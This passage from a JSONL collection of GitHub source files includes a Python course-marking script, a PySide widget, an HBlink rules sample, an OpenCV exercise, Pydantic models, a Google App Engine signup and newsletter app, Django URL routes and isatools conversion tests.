= 0\n else:\n d_mark = 0\n f = f\"./Answers/PathPlanFound{m}.txt\"\n path = path.replace(\"Path: \", \"\")\n with open(f, \"r\") as stu_file:\n stu_path = stu_file.readline().rstrip()\n if stu_path == path:\n d_mark += 10\n else:\n print(\n f'{bcolors.FAIL} Wrong path. Got {stu_path}. Expected {path} {bcolors.ENDC}')\n # +2% for every 3 correct steps (consecutive)\n for s_index, s in enumerate(stu_path):\n if s == path[s_index]:\n if s_index % 3 == 0:\n d_mark += 2\n else:\n break\n\n d_mark = 8 if d_mark > 8 else d_mark\n\n colour = bcolors.OKGREEN if d_mark == 10 else bcolors.WARNING\n colour = bcolors.FAIL if d_mark == 0 else colour\n print(f'{colour} Task D: {d_mark}/10 {bcolors.ENDC}')\n\n\nfor m in range(map_count):\n # Make sure we're only testing answers that exist\n try:\n open(f\"./Answers/answer{m}.txt\", \"r\")\n open(f\"./Answers/PathPlanFound{m}.txt\", \"r\")\n except OSError as e:\n print(f\"{bcolors.FAIL} Failed to find answer{m}.txt or PathPlanFound{m}.txt.\\nPlease check the Answers directory {bcolors.ENDC}\")\n exit(0)\n\n # Copy a test map into ./Map.txt\n if os.path.isfile(\"./Map.txt\"):\n os.remove(\"./Map.txt\")\n shutil.copy(f\"./Maps/Map{m}.txt\", \"./Map.txt\")\n\n # Print the current Map we're testing with\n print(f\"=== Map {m} ===\")\n f = open('./Map.txt', 'r')\n file_contents = f.read()\n print(file_contents)\n f.close()\n\n # Generate solution and answer\n if platform.system() == 'Windows':\n os.system(\"winsln.exe > solution.txt\")\n elif platform.system() == 'Linux':\n os.system(\"./linuxsln > solution.txt\")\n else:\n os.system(\"./sln > solution.txt\")\n\n # This is where the actual marking happens\n with open(\"solution.txt\", \"r\") as solution:\n with open(f\"./Answers/answer{m}.txt\", \"r\") as answer:\n taskA(solution, answer)\n taskB(solution, answer)\n taskC(solution, answer)\n taskD(answer, m)\n","repo_name":"DanSpicyTaco/MTRN4110_PhaseB_Marking","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10856,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"15910323664","text":"from PySide2.QtWidgets import *\nfrom PySide2.QtGui import *\nfrom PySide2.QtCore import *\nfrom source.data import Data\n\n\nclass NodeChaosPlayer(QWidget):\n def __init__(self, parent, item_editor):\n super(NodeChaosPlayer, 
self).__init__(parent=parent)\n        self.setStyleSheet('''\n            QWidget{background-color:\n            qlineargradient(spread:pad, x1:0, y1:0, x2:0, y2:1, stop:0 rgb(173, 173, 173), stop:1 rgb(131, 131, 131));\n            color:rgb(255, 255, 255);\n            }\n            ''')\n        self.item_editor = item_editor\n        self.current_node = None\n        self.graph_view = parent\n        self.layout = QVBoxLayout(self)\n        self.txt_text = QPlainTextEdit(self)\n        self.list_view = QListView(self)\n        self.layout.addWidget(self.txt_text)\n        self.layout.addWidget(self.list_view)\n        self.model = QStandardItemModel()\n        self.list_view.setModel(self.model)\n        self.list_view.clicked.connect(self.item_clicked)\n        self.items = []\n\n    def play(self, node):\n        self.items.clear()\n        self.item_editor.reset_items()\n        self.load_node(node)\n\n    def load_node(self, node):\n        self.current_node = node\n        self.txt_text.setPlainText(node.detail.text)\n        self.model.clear()\n        node.setSelected(True)\n        for item in node.detail.items:\n            self.item_editor.found_item(item)\n            self.items.append(item)\n        for connection in node.connections:\n            next_node = Data.get_node(connection.destination.node.id)\n            if next_node:\n                if connection.path_item:\n                    title = next_node.detail.title\n                    row = QStandardItem(title)\n                    found_items = self.has_required_item(next_node.detail.required_items, self.items)\n                    if not len(found_items):\n                        title = f'(LOCKED){next_node.detail.title}'\n                        row.setText(title)\n                        row.setForeground(QBrush(Qt.red))\n                    row.setData(next_node, Qt.UserRole)\n                    self.model.appendRow(row)\n                    connection.path_item.setSelected(True)\n        self.graph_view.frame_selected(self.graph_view.scene.selectedItems())\n\n    def has_required_item(self, require_items, items):\n        if not require_items:\n            return [True]\n        return list(set([i.id for i in require_items]) & set([i.id for i in items]))\n\n    def clear(self):\n        self.current_node.setSelected(False)\n        for connection in self.current_node.connections:\n            if connection.path_item:\n                connection.path_item.setSelected(False)\n\n    def item_clicked(self, index):\n        item = self.model.itemFromIndex(index)\n        if '(LOCKED)' in item.text():\n            return\n        self.clear()\n        node = item.data(Qt.UserRole)\n        self.load_node(node)","repo_name":"kenculate/NodeChaos","sub_path":"source/nodeChaosPlayer.py","file_name":"nodeChaosPlayer.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"}
{"seq_id":"20110250108","text":"'''\nTHIS EXAMPLE WILL NOT WORK AS IT IS - YOU MUST SPECIFY YOUR OWN VALUES!!!\n\nThis file is organized around the \"Conference Bridges\" that you wish to use. If you're a c-Bridge\nperson, think of these as \"bridge groups\". You might also liken them to a \"reflector\". If a particular\nsystem is \"ACTIVE\" on a particular conference bridge, any traffic from that system will be sent\nto any other system that is active on the bridge as well. This is not an \"end to end\" method, because\neach system must independently be activated on the bridge.\n\nThe first level (e.g. \"WORLDWIDE\" or \"STATEWIDE\" in the examples) is the name of the conference\nbridge. This is any arbitrary ASCII text string you want to use. Under each conference bridge\ndefinition are the following items -- one line for each HBSystem as defined in the main HBlink\nconfiguration file.\n\n    * SYSTEM - The name of the system as listed in the main hblink configuration file (e.g. hblink.cfg)\n        This MUST be the exact same name as in the main config file!!!\n    * TS - Timeslot used for matching traffic to this conference bridge\n        XLX connections should *ALWAYS* use TS 2 only.\n    * TGID - Talkgroup ID used for matching traffic to this conference bridge\n        XLX connections should *ALWAYS* use TG 9 only.\n    * ON and OFF are LISTS of Talkgroup IDs used to trigger this system off and on. Even if you\n        only want one (as shown in the ON example), it has to be in list format. None can be\n        handled with an empty list, such as \" 'ON': [] \".\n    * TO_TYPE is timeout type. If you want to use timers, ON means when it's turned on, it will\n        turn off after the timeout period and OFF means it will turn back on after the timeout\n        period. If you don't want to use timers, set it to anything else, but 'NONE' might be\n        a good value for documentation!\n    * TIMEOUT is a value in minutes for the timeout timer. No, I won't make it 'seconds', so don't\n        ask. Timers are performance \"expense\".\n    * RESET is a list of Talkgroup IDs that, in addition to the ON and OFF lists will cause a running\n        timer to be reset. This is useful if you are using different TGIDs for voice traffic than\n        triggering. If you are not, there is NO NEED to use this feature.\n'''\n\nBRIDGES = {\n    'WORLDWIDE': [\n            {'SYSTEM': 'MASTER-1', 'TS': 1, 'TGID': 1, 'ACTIVE': True, 'TIMEOUT': 2, 'TO_TYPE': 'ON', 'ON': [2,], 'OFF': [9,10], 'RESET': []},\n            {'SYSTEM': 'CLIENT-1', 'TS': 1, 'TGID': 3100, 'ACTIVE': True, 'TIMEOUT': 2, 'TO_TYPE': 'ON', 'ON': [2,], 'OFF': [9,10], 'RESET': []},\n        ],\n    'ENGLISH': [\n            {'SYSTEM': 'MASTER-1', 'TS': 1, 'TGID': 13, 'ACTIVE': True, 'TIMEOUT': 2, 'TO_TYPE': 'NONE', 'ON': [3,], 'OFF': [8,10], 'RESET': []},\n            {'SYSTEM': 'CLIENT-2', 'TS': 1, 'TGID': 13, 'ACTIVE': True, 'TIMEOUT': 2, 'TO_TYPE': 'NONE', 'ON': [3,], 'OFF': [8,10], 'RESET': []},\n        ],\n    'STATEWIDE': [\n            {'SYSTEM': 'MASTER-1', 'TS': 2, 'TGID': 3129, 'ACTIVE': True, 'TIMEOUT': 2, 'TO_TYPE': 'NONE', 'ON': [4,], 'OFF': [7,10], 'RESET': []},\n            {'SYSTEM': 'CLIENT-2', 'TS': 2, 'TGID': 3129, 'ACTIVE': True, 'TIMEOUT': 2, 'TO_TYPE': 'NONE', 'ON': [4,], 'OFF': [7,10], 'RESET': []},\n        ]\n}\n\n'''\nlist the names of each system that should bridge unit to unit (individual) calls.\n'''\n\nUNIT = ['ONE', 'TWO']\n\n'''\nThis is for testing the syntax of the file. 
It won't eliminate all errors, but running this file\nas if it were a Python program itself will tell you if the syntax is correct!\n'''\n\nif __name__ == '__main__':\n    from pprint import pprint\n    pprint(BRIDGES)\n    print(UNIT)\n","repo_name":"HBLink-org/hblink3","sub_path":"rules_SAMPLE.py","file_name":"rules_SAMPLE.py","file_ext":"py","file_size_in_byte":3667,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"48"}{"seq_id":"31857415692","text":"import cv2\r\nimport numpy as np\r\n\r\nimg = np.zeros((300,300,3),np.uint8)\r\ngreen = np.zeros((300,300,3),np.uint8)\r\n\r\ncv2.circle(img,(100,150),70,(0,127,127),cv2.FILLED)\r\ncv2.circle(green,(170,150),70,(127,0,127),cv2.FILLED)\r\n\r\nimg_and = cv2.bitwise_and(img,green)\r\nimg_and = cv2.cvtColor(img_and,cv2.COLOR_BGR2GRAY)\r\n\r\nret, mask1 = cv2.threshold(img_and, 20, 255, cv2.THRESH_BINARY_INV)\r\n\r\nred = np.zeros((300,300,3),np.uint8)\r\n\r\nred[:,:,2] = 255\r\nmask_red = cv2.bitwise_xor(img,red,mask = mask1)\r\n\r\ncv2.imshow('img',img)\r\ncv2.imshow('green',mask_red)\r\n\r\n\r\ncv2.waitKey(0)","repo_name":"supinzhen/100-Days-Of-Code","sub_path":"day13/pra13.py","file_name":"pra13.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"38866753931","text":"# Create models for API requests and responses\nfrom pydantic import BaseModel, Field\nfrom pydantic_core import core_schema\nfrom pydantic.json_schema import JsonSchemaValue\nfrom bson import ObjectId\nfrom typing import Annotated, Any, Optional\n\n# ObjectId Annotation to make it compatible with Pydantic\n# https://stackoverflow.com/questions/76686267/what-is-the-new-way-to-declare-mongo-objectid-with-pydantic-v2-0\nclass ObjectIdPydanticAnnotation:\n    @classmethod\n    def validate_object_id(cls, v: Any, handler) -> ObjectId:\n        if isinstance(v, ObjectId):\n            return v\n\n        s = handler(v)\n        if ObjectId.is_valid(s):\n            return ObjectId(s)\n        else:\n            raise ValueError(\"Invalid ObjectId\")\n\n    @classmethod\n    def __get_pydantic_core_schema__(cls, source_type, _handler) -> core_schema.CoreSchema:\n        assert source_type is ObjectId\n        return core_schema.no_info_wrap_validator_function(\n            cls.validate_object_id, \n            core_schema.str_schema(), \n            serialization=core_schema.to_string_ser_schema(),\n        )\n\n    @classmethod\n    def __get_pydantic_json_schema__(cls, _core_schema, handler) -> JsonSchemaValue:\n        return handler(core_schema.str_schema())\n\n# Annotating ObjectId so that it behaves as a string for serialization purposes \nAnnotatedObjectId = Annotated[ObjectId, ObjectIdPydanticAnnotation]\n\n# Model definition (Creation)\n# To create an entry, every field (except id) is required\nclass Sepal(BaseModel):\n    length: float = Field(..., description=\"Length of the sepal (required)\")\n    width: float = Field(..., description=\"Width of the sepal (required)\")\n\nclass Petal(BaseModel):\n    length: float = Field(..., description=\"Length of the petal (required)\")\n    width: float = Field(..., description=\"Width of the petal (required)\")\n\nclass Flower(BaseModel):\n    sepal: Sepal = Field(..., description=\"Sepal information (required)\")\n    petal: Petal = Field(..., description=\"Petal information (required)\")\n    species: str = Field(..., description=\"Species name (required)\")\n    id: AnnotatedObjectId = Field(alias=\"_id\", description=\"Flower ID (generated)\", default_factory=ObjectId)\n\n    class Config:\n        populate_by_name = True\n        
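# populate_by_name=True lets the model accept the field name \"id\" as well as its alias \"_id\" on input\n        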
json_schema_extra = {\n \"example\": {\n \"_id\": \"64c1d7c991e84e28c735a5c6\",\n \"sepal\": {\"length\": 5.1, \"width\": 3.5},\n \"petal\": {\"length\": 1.4, \"width\": 0.2},\n \"species\": \"Iris-setosa\"\n }\n }\n\n# Model definition (Update)\n# To update an entry, every field is optional (and there is no id, that is not updatable)\nclass SepalUpdate(BaseModel):\n length: Optional[float] = Field(None, description=\"Length of the sepal\")\n width: Optional[float] = Field(None, description=\"Width of the sepal\")\n\nclass PetalUpdate(BaseModel):\n length: Optional[float] = Field(None, description=\"Length of the petal\")\n width: Optional[float] = Field(None, description=\"Width of the petal\")\n\nclass FlowerUpdate(BaseModel):\n sepal: Optional[SepalUpdate] = Field(None, description=\"Sepal information\")\n petal: Optional[PetalUpdate] = Field(None, description=\"Petal information\")\n species: Optional[str] = Field(None, description=\"Species name\")\n\n class Config:\n json_schema_extra = {\n \"example\": {\n \"sepal\": {\"length\": 5.1, \"width\": 3.5},\n \"petal\": {\"length\": 1.4, \"width\": 0.2},\n \"species\": \"Iris-setosa\"\n }\n }\n","repo_name":"javierlopezrodriguez/mongodb-fastapi","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26728812333","text":"import webapp2\nimport os\nfrom google.appengine.ext.webapp import template\nfrom google.appengine.api import mail\nfrom google.appengine.ext import ndb\nimport hashlib\nfrom protorpc.messages import Enum\nfrom google.appengine.api import users\n\nimport logging # TODO remove \n\n\n# CONSTANTS\n\nNEWS_LETTER_SUBSCRIPTIONS_DATASTORE = 'NewsLetterSubscriptions'\nDRIVER_SIGNUP_DATASTORE = 'DriverSignup'\nADVERTISER_SIGNUP_DATASTORE = 'AdsSignup'\n\nVERIFY_NEWSLETTER = 'newsletter'\nVERIFY_DRIVER = 'driver'\nVERIFY_ADVERTISER = 'advertiser'\n\n# DATA MODELS\n\nclass NewsLetterSubscriptions(ndb.Model):\n email = ndb.StringProperty()\n verify_id = ndb.StringProperty()\n verified = ndb.BooleanProperty(default=False)\n date = ndb.DateTimeProperty(auto_now_add=True)\n \n @classmethod\n def query_verify_id(cls, key):\n return cls.query().filter(cls.verify_id==key).order(-cls.verify_id)\n \nclass DriverInfo(ndb.Model):\n name = ndb.StringProperty()\n phone = ndb.StringProperty()\n email = ndb.StringProperty()\n city = ndb.StringProperty()\n state = ndb.StringProperty()\n company = ndb.PickleProperty()\n segments = ndb.IntegerProperty()\n mornings = ndb.IntegerProperty()\n midday = ndb.IntegerProperty()\n afternoon = ndb.IntegerProperty()\n latenight = ndb.IntegerProperty()\n verify_id = ndb.StringProperty()\n verified = ndb.BooleanProperty(default=False)\n date = ndb.DateTimeProperty(auto_now_add=True)\n \n @classmethod\n def query_verify_id(cls, key):\n return cls.query().filter(cls.verify_id==key).order(-cls.verify_id)\n \nclass AdvertiserInfo(ndb.Model):\n name = ndb.StringProperty()\n company = ndb.StringProperty()\n phone = ndb.StringProperty()\n email = ndb.StringProperty()\n target_market = ndb.StringProperty()\n territories = ndb.StringProperty()\n other_info = ndb.StringProperty()\n verify_id = ndb.StringProperty()\n verified = ndb.BooleanProperty(default=False)\n date = ndb.DateTimeProperty(auto_now_add=True)\n \n @classmethod\n def query_verify_id(cls, key):\n return cls.query().filter(cls.verify_id==key).order(-cls.verify_id)\n \nclass AdCampaign(ndb.Model):\n name = 
ndb.StringProperty()\n    details = ndb.StringProperty()\n    link = ndb.StringProperty()\n    clicks = ndb.IntegerProperty(default=0)\n    start_date = ndb.DateTimeProperty(auto_now_add=True)\n    \n    @classmethod\n    def add_click(cls, key):\n        item = cls.query().filter(cls.link==key).order(-cls.start_date).get()\n        if item is None:\n            return False\n        item.clicks = item.clicks + 1\n        item.put()\n        return True\n    \n    @classmethod\n    def name_exist(cls, key):\n        item = cls.query().filter(cls.name==key).order(-cls.start_date).get()\n        if item is None:\n            return False\n        else:\n            return True\n    \n    # REQUEST HANDLERS \n\nclass MainHandler(webapp2.RequestHandler):\n    def get(self):\n        path = os.path.join(os.path.dirname(__file__), 'templates/index.html')\n        template_values = {\n            'message_class': 'no_message',\n            'message_text': ' ',\n        }\n        self.response.out.write(template.render(path, template_values))\n    \nclass AdvertiserSignup(webapp2.RequestHandler):\n    def get(self):\n        path = os.path.join(os.path.dirname(__file__), 'templates/ad_signup.html')\n        template_values = {\n            'message_class': 'no_message',\n            'message_text': ' ',\n        }\n        self.response.out.write(template.render(path, template_values))\n    \n    def post(self):\n        template_values = {\n            'message_class': 'good_message',\n            'message_text': 'Please check your inbox for a verification email.',\n        }\n        error = False\n        advertiser = AdvertiserInfo()\n        #get variables from POST and validate\n        if Validate(self.request.get('name'), ValidationTypes.String, True) is True:\n            advertiser.name = self.request.get('name')\n        else:\n            error = True\n        if Validate(self.request.get('company'), ValidationTypes.String, True) is True:\n            advertiser.company = self.request.get('company')\n        else:\n            error = True\n        if Validate(self.request.get('phone'), ValidationTypes.String, True) is True:\n            advertiser.phone = self.request.get('phone')\n        else:\n            error = True\n        if Validate(self.request.get('email'), ValidationTypes.Email, True) is True:\n            advertiser.email = self.request.get('email')\n        else:\n            error = True\n        advertiser.target_market = self.request.get('target_market')\n        advertiser.territories = self.request.get('territories')\n        advertiser.other_info = self.request.get('other_info')\n        \n        #Check to see if error was found in validation of data\n        if error is True:\n            template_values['message_class'] = 'bad_message'\n            template_values['message_text'] = \"Make sure name, email, phone, and company fields are filled out\"\n        else:\n            #data good = save and email advertiser\n            advertiser.verify_id = hashlib.md5(advertiser.email).hexdigest()\n            advertiser.put()\n            #create and send the email\n            confirmation_url = 'http://dryve-web.appspot.com/verify/%s/' %VERIFY_ADVERTISER + advertiser.verify_id\n            sender_address = \"No-Reply \"\n            subject = \"Confirm your email\"\n            body = \"\"\"\nThank you for signing up for the drYve program! 
Please confirm your email address by\nclicking on the link below:\n\n%s\n\"\"\" % confirmation_url\n            mail.send_mail(sender_address, advertiser.email, subject, body)\n        \n        #send results to user\n        path = os.path.join(os.path.dirname(__file__), 'templates/ad_signup.html')\n        self.response.out.write(template.render(path, template_values))\n    \n    \nclass DriverSignup(webapp2.RequestHandler):\n    def get(self):\n        path = os.path.join(os.path.dirname(__file__), 'templates/signup.html')\n        template_values = {\n            'message_class': 'no_message',\n            'message_text': ' ',\n        }\n        self.response.out.write(template.render(path, template_values))\n    \n    def post(self):\n        template_values = {\n            'message_class': 'good_message',\n            'message_text': 'Please check your inbox for a verification email.',\n        }\n        error = False\n        driver = DriverInfo()\n        #get variables from POST and validate\n        if Validate(self.request.get('name'), ValidationTypes.String, True) is True:\n            driver.name = self.request.get('name')\n        else:\n            error = True\n        if Validate(self.request.get('phone'), ValidationTypes.String, True) is True:\n            driver.phone = self.request.get('phone')\n        else:\n            error = True\n        if Validate(self.request.get('email'), ValidationTypes.Email, True) is True:\n            driver.email = self.request.get('email')\n        else:\n            error = True\n        if Validate(self.request.get('city'), ValidationTypes.String, True) is True:\n            driver.city = self.request.get('city')\n        else:\n            error = True\n        if Validate(self.request.get('state'), ValidationTypes.String, True) is True:\n            driver.state = self.request.get('state')\n        else:\n            error = True\n        if Validate(self.request.get('segments'), ValidationTypes.Integer, True) is True:\n            driver.segments = int(self.request.get('segments'))\n        else:\n            error = True\n        \n        if Validate(self.request.POST.getall('company'), ValidationTypes.Array, True) is True:\n            driver.company = self.request.POST.getall('company')\n        else:\n            error = True\n        \n        driver.mornings = int(self.request.get('mornings'))\n        driver.midday = int(self.request.get('midday'))\n        driver.afternoon = int(self.request.get('afternoon'))\n        driver.latenight = int(self.request.get('latenight'))\n        \n        #Check to see if error was found in validation of data\n        if error is True:\n            template_values['message_class'] = 'bad_message'\n            template_values['message_text'] = \"Make sure all fields are filled out\"\n        else:\n            #data good = save and email driver\n            driver.verify_id = hashlib.md5(driver.email).hexdigest()\n            driver.put()\n            #create and send the email\n            confirmation_url = 'http://dryve-web.appspot.com/verify/%s/' %VERIFY_DRIVER + driver.verify_id\n            sender_address = \"No-Reply \"\n            subject = \"Confirm your email\"\n            body = \"\"\"\nThank you for signing up for the drYve program! 
Please confirm your email address by\nclicking on the link below:\n\n%s\n\"\"\" % confirmation_url\n            mail.send_mail(sender_address, driver.email, subject, body)\n        \n        #send results to user\n        path = os.path.join(os.path.dirname(__file__), 'templates/signup.html')\n        self.response.out.write(template.render(path, template_values))\n\nclass NewsLetter(webapp2.RequestHandler):\n    def post(self):\n        template_values = {\n            'message_class': 'good_message',\n            'message_text': 'Please check your inbox for a verification email.',\n        }\n        #gets variables for database\n        newsletter_email = self.request.get('newsletter_email')\n        #verify email\n        if not mail.is_email_valid(newsletter_email):\n            # prompt user to enter a valid address \n            template_values['message_class'] = 'bad_message'\n            template_values['message_text'] = \"something's wrong with the email you entered, please check and try again.\"\n        else:\n            verify_id = hashlib.md5(newsletter_email).hexdigest()\n            #creates and saves database entry\n            subscriber = NewsLetterSubscriptions()\n            subscriber.email = newsletter_email\n            subscriber.verify_id = verify_id\n            subscriber.put()\n            #create and send verification email\n            confirmation_url = 'http://dryve-web.appspot.com/verify/%s/' %VERIFY_NEWSLETTER + verify_id\n            sender_address = \"No-Reply \"\n            subject = \"Confirm your subscription\"\n            body = \"\"\"\nThank you for signing up for the drYve newsletter! Please confirm your email address by\nclicking on the link below:\n\n%s\n\"\"\" % confirmation_url\n            mail.send_mail(sender_address, newsletter_email, subject, body)\n            \n            logging.info(confirmation_url)\n        \n        #let user know about email\n        path = os.path.join(os.path.dirname(__file__), 'templates/index.html')\n        self.response.out.write(template.render(path, template_values))\n        \nclass AdHandler(webapp2.RequestHandler):\n    def get(self, campaign_link):\n        #add click to campaign\n        AdCampaign.add_click(campaign_link)\n        #route user to homescreen\n        path = os.path.join(os.path.dirname(__file__), 'templates/index.html')\n        template_values = {\n            'message_class': 'no_message',\n            'message_text': ' ',\n        }\n        self.response.out.write(template.render(path, template_values))\n\nclass VerifyAccount(webapp2.RequestHandler):\n    def get(self, verify_type, verify_id):\n        #get datastore object based on type\n        if verify_type == VERIFY_NEWSLETTER:\n            data = NewsLetterSubscriptions.query_verify_id(verify_id).get()\n        elif verify_type == VERIFY_DRIVER:\n            data = DriverInfo.query_verify_id(verify_id).get()\n        elif verify_type == VERIFY_ADVERTISER:\n            data = AdvertiserInfo.query_verify_id(verify_id).get()\n        else:\n            self.response.out.write(\"Sorry, not sure where you are trying to go. 
If you got here from a link, please let us know at contact@dryve.io\")\n            return\n        #Update key in datastore based on id\n        data.verified = True\n        data.put()\n        #inform user of results\n        self.response.out.write(\"Thanks %s, your email has been verified!\" % data.email)\n\nclass AdminRedirect(webapp2.RequestHandler):\n    def get(self):\n        self.redirect(self.request.url+'/')\n\n#Utility Functions\n    \nclass ValidationTypes(Enum):\n    String = 1\n    Integer = 2\n    Email = 3\n    Array = 4\n    \ndef Validate(data, typ, empty=False):\n    if typ is ValidationTypes.String:\n        if isinstance(data, unicode) == False:\n            return False\n        if empty is True:\n            if data is None or len(data) == 0:\n                return False\n    elif typ is ValidationTypes.Integer:\n        logging.info(data)\n        if len(data) == 0:\n            return False\n        if isinstance(int(data), int) == False:\n            return False\n        if empty is True:\n            if data is None:\n                return False\n    elif typ is ValidationTypes.Email:\n        if mail.is_email_valid(data) == False:\n            return False\n        if empty is True:\n            if data is None or len(data) == 0:\n                return False\n    elif typ is ValidationTypes.Array:\n        if len(data) == 0:\n            return False\n    \n    return True\n    \n    \n# ROOT\n\napp = webapp2.WSGIApplication([\n    ('/', MainHandler),\n    ('/signup/advertiser', AdvertiserSignup),\n    ('/signup/driver', DriverSignup),\n    ('/signup', DriverSignup),\n    ('/newsletter', NewsLetter),\n    (r'/verify/(\w+)/(\w+)', VerifyAccount), #/verify//\n    (r'/ad/(\w+)', AdHandler), #/ad/\n    ('/admin', AdminRedirect),\n], debug=False)\n","repo_name":"nicollis/dryve","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"74939123026","text":"from django.urls import path\nfrom .views import (\n    post_list,\n    post_create,\n    post_detail,\n    # post_update,\n    # post_delete,\n)\n\napp_name = 'blog'\nurlpatterns = [\n    path('post/', post_list, name='postlist'),\n    path('post/create/', post_create),\n    path('post//', post_detail, name='postdetail'),\n    # path('post//edit/', post_update, name='postupdate'),\n    # path('post//delete/', post_delete),\n]\n","repo_name":"belal-bh/CLIC_PUST","sub_path":"src/post/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"72638627987","text":"# Test conversion to W4M format\n\nimport filecmp\nimport os\nimport shutil\nimport tempfile\nimport unittest\nfrom isatools.convert import isatab2w4m\nfrom isatools.tests import utils\n\n\n# Test presence of data folder\ndef setUpModule():\n    if not os.path.exists(utils.DATA_DIR):\n        raise FileNotFoundError(\n            'Could not find test data directory in {0}. 
Ensure you have cloned '\n 'the ISAdatasets repository using git clone -b tests '\n '--single-branch git@github.com:ISA-tools/ISAdatasets {0}'.format(\n utils.DATA_DIR))\n \n \n# Test class\nclass TestIsatab2w4m(unittest.TestCase):\n\n # Initialize instance resources\n def setUp(self):\n self._tmp_dir = tempfile.mkdtemp()\n\n # Destroy resources\n def tearDown(self):\n shutil.rmtree(self._tmp_dir)\n\n def plain_test(self, study, test_dir):\n # Convert\n isatab2w4m.convert(\n input_dir=os.path.join(utils.TAB_DATA_DIR, test_dir), \n output_dir=self._tmp_dir, \n sample_output='%s-w4m-sample-metadata.tsv', \n variable_output='%s-w4m-variable-metadata.tsv', \n matrix_output='%s-w4m-sample-variable-matrix.tsv')\n # Check files\n for x in [\n 'sample-metadata', 'variable-metadata', 'sample-variable-matrix']:\n ref_file = os.path.join(utils.TAB_DATA_DIR, test_dir, '.'.join(\n ['-'.join([study, 'w4m', x]), 'tsv']))\n output_file = os.path.join(self._tmp_dir, '.'.join(\n ['-'.join([study, 'w4m', x]), 'tsv']))\n self.assertTrue(os.path.exists(output_file))\n self.assertTrue(filecmp.cmp(output_file, ref_file),\n 'Output file \"{0}\" differs from reference file \"{1}\".'.format(output_file, ref_file))\n\n # Test MTBLS30\n def test_MTBLS30(self):\n self.plain_test('MTBLS30', 'MTBLS30-w4m')\n\n # Test MTBLS404\n def test_MTBLS404(self):\n self.plain_test('MTBLS404', 'MTBLS404-w4m')\n\n # Test MTBLS338\n def test_MTBLS338(self):\n self.plain_test('MTBLS338', 'MTBLS338-w4m')\n\n # Test NA filtering\n def na_filtering_test(self, study, test_dir, samp_na_filtering=None, \n var_na_filtering=None):\n var_filtering = ','.join(var_na_filtering)\n\n # Set file names\n output_files = dict()\n ref_files = dict()\n for x in [\n 'sample-metadata', 'variable-metadata', 'sample-variable-matrix']:\n filename = '.'.join(\n ['-'.join([study, 'w4m', var_filtering, x, 'na-filtering']), \n 'tsv'])\n output_files[x] = os.path.join(self._tmp_dir, filename)\n ref_files[x] = os.path.join(utils.TAB_DATA_DIR, test_dir, filename)\n # Convert\n isatab2w4m.convert(input_dir=os.path.join(utils.TAB_DATA_DIR, test_dir),\n output_dir=self._tmp_dir,\n sample_output=output_files['sample-metadata'],\n variable_output=output_files['variable-metadata'],\n matrix_output=output_files['sample-variable-matrix'],\n samp_na_filtering=samp_na_filtering,\n var_na_filtering=var_na_filtering)\n # Check files\n for x in [\n 'sample-metadata', 'variable-metadata', 'sample-variable-matrix']:\n self.assertTrue(os.path.exists(output_files[x]))\n self.assertTrue(\n filecmp.cmp(output_files[x], ref_files[x]),\n 'Output file \"{0}\" differs from reference file \"{1}\".'.format(\n output_files[x], ref_files[x]))\n\n # Test MTBLS404 NA filtering\n def test_MTBLS404_na_filtering(self):\n self.na_filtering_test('MTBLS404', 'MTBLS404-w4m',\n samp_na_filtering=['Characteristics[gender]'],\n var_na_filtering=['mass_to_charge'])\n self.na_filtering_test('MTBLS404', 'MTBLS404-w4m',\n samp_na_filtering=['Characteristics[gender]'],\n var_na_filtering=['mass_to_charge',\n 'mass_to_charge'])\n self.na_filtering_test('MTBLS404', 'MTBLS404-w4m',\n samp_na_filtering=['Characteristics[gender]'],\n var_na_filtering=['charge'])\n self.na_filtering_test('MTBLS404', 'MTBLS404-w4m',\n samp_na_filtering=['Characteristics[gender]'],\n var_na_filtering=['database'])\n self.na_filtering_test('MTBLS404', 'MTBLS404-w4m',\n samp_na_filtering=['Characteristics[gender]'],\n var_na_filtering=['charge', 'database'])\n\n # Test assay selection\n def test_assay_selection(self):\n\n study = 
'MTBLS30'\n test_dir = 'MTBLS30-w4m'\n\n for assay in ['a_york_src_GC_mass_spectrometry.txt',\n 'a_york_src_FIA_mass_spectrometry.txt']:\n\n # Convert\n isatab2w4m.convert(\n input_dir=os.path.join(utils.TAB_DATA_DIR, test_dir),\n output_dir=self._tmp_dir,\n sample_output='%s-w4m-sample-metadata-{0}.tsv'.format(assay),\n variable_output='%s-w4m-variable-metadata-{0}.tsv'.format(\n assay),\n matrix_output='%s-w4m-sample-variable-matrix-{0}.tsv'.format(\n assay), assay_filename=assay)\n\n # Check files\n for x in ['sample-metadata', 'variable-metadata',\n 'sample-variable-matrix']:\n ref_file = os.path.join(utils.TAB_DATA_DIR, test_dir, '.'.join(\n ['-'.join([study, 'w4m', x, assay]), 'tsv']))\n output_file = os.path.join(self._tmp_dir, '.'.join(\n ['-'.join([study, 'w4m', x, assay]), 'tsv']))\n self.assertTrue(os.path.exists(output_file))\n self.assertTrue(\n filecmp.cmp(output_file, ref_file),\n 'Output file \"{0}\" differs from reference file \"{1}\".'.format(output_file, ref_file))\n","repo_name":"ISA-tools/isa-api","sub_path":"tests/convert/test_isatab2w4m.py","file_name":"test_isatab2w4m.py","file_ext":"py","file_size_in_byte":6224,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"48"} +{"seq_id":"41471567007","text":"import logging\nimport os\n\nimport numpy as np\n\nfrom offmark.degenerator.de_shuffler import DeShuffler\nfrom offmark.extract.dwt_dct_svd_decoder import DwtDctSvdDecoder\nfrom offmark.video.extractor import Extractor\nfrom offmark.video.frame_reader import FileDecoder\n\nlogger = 